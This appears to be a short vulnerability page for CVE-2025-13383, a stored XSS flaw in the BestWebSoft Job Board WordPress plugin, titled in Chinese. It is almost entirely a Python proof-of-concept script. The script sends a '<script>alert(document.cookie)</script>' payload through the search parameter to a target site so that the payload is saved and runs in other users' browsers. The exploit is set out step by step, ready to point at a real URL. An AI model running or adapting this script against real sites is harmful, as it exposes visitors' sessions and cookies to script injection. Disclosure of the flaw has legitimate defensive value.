CVE-2025-13383 WordPress Job Board插件存储型XSS漏洞

import requests import urllib.parse # CVE-2025-13383 PoC - Stored XSS in Job Board by BestWebSoft plugin # Target: WordPress site with Job Board plugin <= 1.2.1 target_url = "http://target-wordpress-site.com/" # Construct malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" encoded_payload = urllib.parse.quote(xss_payload) # Step 1: Craft malicious search URL with XSS payload malicious_url = f"{target_url}?s={encoded_payload}&job-board-search=Save+Search" # Step 2: Send request to save search with XSS payload # This will store the unsanitized $_GET data via update_user_meta() print(f"[*] Sending malicious request to: {malicious_url}") response = requests.get(malicious_url, allow_redirects=True) # Step 3: When any user views the saved search or profile, # the XSS payload will execute in their browser if response.status_code == 200: print("[+] Malicious search saved successfully") print("[+] XSS payload stored in database") print("[+] Payload will execute when users view saved searches") else: print("[-] Failed to save malicious search")